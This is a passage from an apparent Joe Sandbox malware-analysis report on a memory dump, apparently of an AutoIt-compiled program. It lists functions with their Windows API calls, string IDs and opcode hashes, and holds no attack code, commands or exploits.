                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00E82FC9
                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E82FF6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                          • String ID: close all
                                                                                                          • API String ID: 469580280-3243417748
                                                                                                          • Opcode ID: 832f56d9d2c9ccd469cc4adf0aa526a4a6c602235978a2bef4232da7a2677883
                                                                                                          • Instruction ID: 8d3b0fb4b65413c64697bdb2ebdb0019e9f770fa85081ae8894c4241c38b9713
                                                                                                          • Opcode Fuzzy Hash: 832f56d9d2c9ccd469cc4adf0aa526a4a6c602235978a2bef4232da7a2677883
                                                                                                          • Instruction Fuzzy Hash: 1DA16D707422128FCB29EF20D494B69F3A5EF04754F1462ADE90EBB261CB31AD56CF91
                                                                                                          Function 00E9AD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnumChildWindows.USER32(?,00E9B13A), ref: 00E9B078
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ChildEnumWindows
                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                          • API String ID: 3555792229-1603158881
                                                                                                          • Opcode ID: 103c65def5be9a6cbe9323e72bf9f896e7d444a6ea8c54e64eb4316651944856
                                                                                                          • Instruction ID: 59f39dff50d97c372f7aacadb249b063744f5f1707c159e65dd900825616cdc0
                                                                                                          • Opcode Fuzzy Hash: 103c65def5be9a6cbe9323e72bf9f896e7d444a6ea8c54e64eb4316651944856
                                                                                                          • Instruction Fuzzy Hash: B4919F70600215EACF08EF60D482BEEFBB5BF04344F18A129E95AB7251DF306999DBD1
                                                                                                          Function 00E431F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 00E4327E
                                                                                                            • Part of subcall function 00E4218F: GetClientRect.USER32(?,?), ref: 00E421B8
                                                                                                            • Part of subcall function 00E4218F: GetWindowRect.USER32(?,?), ref: 00E421F9
                                                                                                            • Part of subcall function 00E4218F: ScreenToClient.USER32(?,?), ref: 00E42221
                                                                                                          • GetDC.USER32 ref: 00E7D073
                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E7D086
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00E7D094
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00E7D0A9
                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00E7D0B1
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E7D13C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                          • String ID: U
                                                                                                          • API String ID: 4009187628-3372436214
                                                                                                          • Opcode ID: b5a3a7dc726e883bf78df3ee84567e6c3d7c799afecbbcf293dec79eb5713dda
                                                                                                          • Instruction ID: 3fb128c8ecad497127705c4e40c2bf43b52dcbc9268a7ac9f34ffd1497071366
                                                                                                          • Opcode Fuzzy Hash: b5a3a7dc726e883bf78df3ee84567e6c3d7c799afecbbcf293dec79eb5713dda
                                                                                                          • Instruction Fuzzy Hash: 44711530508209DFCF21DF64DC80AEA7BB6FF49324F14A269ED597A1A5C7319C41DB60
                                                                                                          Function 00ECC634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
                                                                                                            • Part of subcall function 00E42714: GetCursorPos.USER32(?), ref: 00E42727
                                                                                                            • Part of subcall function 00E42714: ScreenToClient.USER32(00F077B0,?), ref: 00E42744
                                                                                                            • Part of subcall function 00E42714: GetAsyncKeyState.USER32(00000001), ref: 00E42769
                                                                                                            • Part of subcall function 00E42714: GetAsyncKeyState.USER32(00000002), ref: 00E42777
                                                                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00ECC69C
                                                                                                          • ImageList_EndDrag.COMCTL32 ref: 00ECC6A2
                                                                                                          • ReleaseCapture.USER32 ref: 00ECC6A8
                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00ECC752
                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00ECC765
                                                                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00ECC847
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                          • API String ID: 1924731296-2107944366
                                                                                                          • Opcode ID: 4e50e9ed3c461e4d56c7514ea30bfece501808affe0f934c2e8adcaf6160cf76
                                                                                                          • Instruction ID: cdff212960c525df4057dd78f7534c5e437fac61683fe6c662e14d5b4209c709
                                                                                                          • Opcode Fuzzy Hash: 4e50e9ed3c461e4d56c7514ea30bfece501808affe0f934c2e8adcaf6160cf76
                                                                                                          • Instruction Fuzzy Hash: EB51BC70604304AFD704EF20DD59F6A7BE1FB84310F20895DF995A72E2CB31A949DB52
                                                                                                          Function 00EB20E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EB211C
                                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EB2148
                                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00EB218A
                                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EB219F
                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EB21AC
                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00EB21DC
                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00EB2223
                                                                                                            • Part of subcall function 00EB2B4F: GetLastError.KERNEL32(?,?,00EB1EE3,00000000,00000000,00000001), ref: 00EB2B64
                                                                                                            • Part of subcall function 00EB2B4F: SetEvent.KERNEL32(?,?,00EB1EE3,00000000,00000000,00000001), ref: 00EB2B79
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 2603140658-3916222277
                                                                                                          • Opcode ID: 561b6bea96c7c3920d02830401f05c82badcbdd9e8138f1e20bf95684e2ffef2
                                                                                                          • Instruction ID: 4db78dff3997c98c91cd6e450199eec2df1c8a2daaef4faccef5d25b7a41e63d
                                                                                                          • Opcode Fuzzy Hash: 561b6bea96c7c3920d02830401f05c82badcbdd9e8138f1e20bf95684e2ffef2
                                                                                                          • Instruction Fuzzy Hash: D7416DB1501209BFEB129F51DC89FFF7BACEF08354F04511AFA05AA151DB749E449BA0
                                                                                                          Function 00EB9330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00ED0980), ref: 00EB9412
                                                                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00ED0980), ref: 00EB9446
                                                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EB95C0
                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00EB95EA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                          • String ID:
                                                                                                          • API String ID: 560350794-0
                                                                                                          • Opcode ID: f51305cadcc50ea047e2326b9b2fb973943a4a0a256aebcab9aca934f1f895e8
                                                                                                          • Instruction ID: 37c53877667389c143def8da02527103b243f9b896f6cc8770315d90e9419e89
                                                                                                          • Opcode Fuzzy Hash: f51305cadcc50ea047e2326b9b2fb973943a4a0a256aebcab9aca934f1f895e8
                                                                                                          • Instruction Fuzzy Hash: AFF10A71A00219EFCB14DFA4C884EEEB7B9FF45314F149059FA16AB252DB31AE45CB60
                                                                                                          Function 00EA527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00EA4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EA3B8A,?), ref: 00EA4BE0
                                                                                                            • Part of subcall function 00EA4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EA3B8A,?), ref: 00EA4BF9
                                                                                                            • Part of subcall function 00EA4FEC: GetFileAttributesW.KERNEL32(?,00EA3BFE), ref: 00EA4FED
                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00EA52FB
                                                                                                          • _wcscmp.LIBCMT ref: 00EA5315
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00EA5330
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 793581249-0
                                                                                                          • Opcode ID: dfed36e54772633b0b27467b6dabc6f87eb65c0f0806d9e448b035ac8472e71d
                                                                                                          • Instruction ID: 15806be6f10962323e276fe4b2050c9badd562732ebe459a1e9a62b3c819c0c4
                                                                                                          • Opcode Fuzzy Hash: dfed36e54772633b0b27467b6dabc6f87eb65c0f0806d9e448b035ac8472e71d
                                                                                                          • Instruction Fuzzy Hash: E85195B20087849BC724DB60D881ADBB7EC9F89341F50191EB689E7152EF31B68CC766
                                                                                                          Function 00EC8C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EC8D24
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InvalidateRect
                                                                                                          • String ID:
                                                                                                          • API String ID: 634782764-0
                                                                                                          • Opcode ID: dbcc3e64464e9915dd02f6db9de2caca57f4436c6a2ea858514f740264c8d811
                                                                                                          • Instruction ID: 4681e923ac3c14cf09d8934e80e7b392a7f766411e3ae0e16039280520db8673
                                                                                                          • Opcode Fuzzy Hash: dbcc3e64464e9915dd02f6db9de2caca57f4436c6a2ea858514f740264c8d811
                                                                                                          • Instruction Fuzzy Hash: 5251D330641204BFEB249F24CF89F997BA4EB01314F25651AF611F61E1CF72AD42DB51
                                                                                                          Function 00E42F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E7C638
                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E7C65A
                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E7C672
                                                                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E7C690
                                                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E7C6B1
                                                                                                          • DestroyIcon.USER32(00000000), ref: 00E7C6C0
                                                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E7C6DD
                                                                                                          • DestroyIcon.USER32(?), ref: 00E7C6EC
                                                                                                            • Part of subcall function 00ECAAD4: DeleteObject.GDI32(00000000), ref: 00ECAB0D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                          • String ID:
                                                                                                          • API String ID: 2819616528-0
                                                                                                          • Opcode ID: b57b2405faccdd18ad87b587d7bc8797181c8006443e1f91187b9144ec146d73
                                                                                                          • Instruction ID: 3a470fc2237820b44c69c5a25dd28942db0b31df6266a4d4afd06150111ae64b
                                                                                                          • Opcode Fuzzy Hash: b57b2405faccdd18ad87b587d7bc8797181c8006443e1f91187b9144ec146d73
                                                                                                          • Instruction Fuzzy Hash: DB517970A00209AFDB20DF25EC85BAA77F9FB48710F60551DFA06B7290DB71E894DB50
                                                                                                          Function 00E9A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E9B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E9B54D
                                                                                                            • Part of subcall function 00E9B52D: GetCurrentThreadId.KERNEL32 ref: 00E9B554
                                                                                                            • Part of subcall function 00E9B52D: AttachThreadInput.USER32(00000000,?,00E9A23B,?,00000001), ref: 00E9B55B
                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E9A246
                                                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E9A263
                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00E9A266
                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E9A26F
                                                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E9A28D
                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E9A290
                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E9A299
                                                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E9A2B0
                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E9A2B3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2014098862-0
                                                                                                          • Opcode ID: 39289e37a4ef0ceed6fbb111e49ba030fb41b8fd86f91621e3fd5d9267c21b80
                                                                                                          • Instruction ID: e1f0f84959f4ce5c5325cf522543baabbe74bae775888269083c160177ad31bd
                                                                                                          • Opcode Fuzzy Hash: 39289e37a4ef0ceed6fbb111e49ba030fb41b8fd86f91621e3fd5d9267c21b80
                                                                                                          • Instruction Fuzzy Hash: C611E1B1951218BEFB106F61AC8AF6A3B6DEB8C750F15141AF3507B0E0CAF35C509AA0
                                                                                                          Function 00E994D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E9915A,00000B00,?,?), ref: 00E994E2
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00E9915A,00000B00,?,?), ref: 00E994E9
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E9915A,00000B00,?,?), ref: 00E994FE
                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00E9915A,00000B00,?,?), ref: 00E99506
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00E9915A,00000B00,?,?), ref: 00E99509
                                                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E9915A,00000B00,?,?), ref: 00E99519
                                                                                                          • GetCurrentProcess.KERNEL32(00E9915A,00000000,?,00E9915A,00000B00,?,?), ref: 00E99521
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00E9915A,00000B00,?,?), ref: 00E99524
                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00E9954A,00000000,00000000,00000000), ref: 00E9953E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 1957940570-0
                                                                                                          • Opcode ID: 65a8076e05168f9825a9af6db228c5116b0aa7567eb9c1391bd179328ccf0664
                                                                                                          • Instruction ID: 3cdd1784dde81fbd1b92eebe824bdc85fe0cdf28f9fa62427add6dd2cfa29829
                                                                                                          • Opcode Fuzzy Hash: 65a8076e05168f9825a9af6db228c5116b0aa7567eb9c1391bd179328ccf0664
                                                                                                          • Instruction Fuzzy Hash: 7601BF75242304BFE710AB65EC4DF6B7B6CEB89711F454411FA05EB1A1D6709804CB20
                                                                                                          Function 00EBA20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                          • API String ID: 0-572801152
                                                                                                          • Opcode ID: 14a8f973526af529604bdb45f230a701f7983a618a5df43cd539d808da42a089
                                                                                                          • Instruction ID: e6d218967914309aeb1e00643bbc67e49eabf542b36572c98a1273d7b218866e
                                                                                                          • Opcode Fuzzy Hash: 14a8f973526af529604bdb45f230a701f7983a618a5df43cd539d808da42a089
                                                                                                          • Instruction Fuzzy Hash: 0EC17D71A0021A9BDF24CFA8D884AEFB7F5FB48314F189479E915BB280E7709D458B91
                                                                                                          Function 00EB97FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearInit$_memset
                                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                          • API String ID: 2862541840-625585964
                                                                                                          • Opcode ID: eaa6b95797c1e949bd101cedadf6eb0c5c3253c6bc7fa10af041ce7d7db760d5
                                                                                                          • Instruction ID: ad81b456f3a8dec136b08a78a328d9dc19a43bda0e4e29f65f99c79d49b134eb
                                                                                                          • Opcode Fuzzy Hash: eaa6b95797c1e949bd101cedadf6eb0c5c3253c6bc7fa10af041ce7d7db760d5
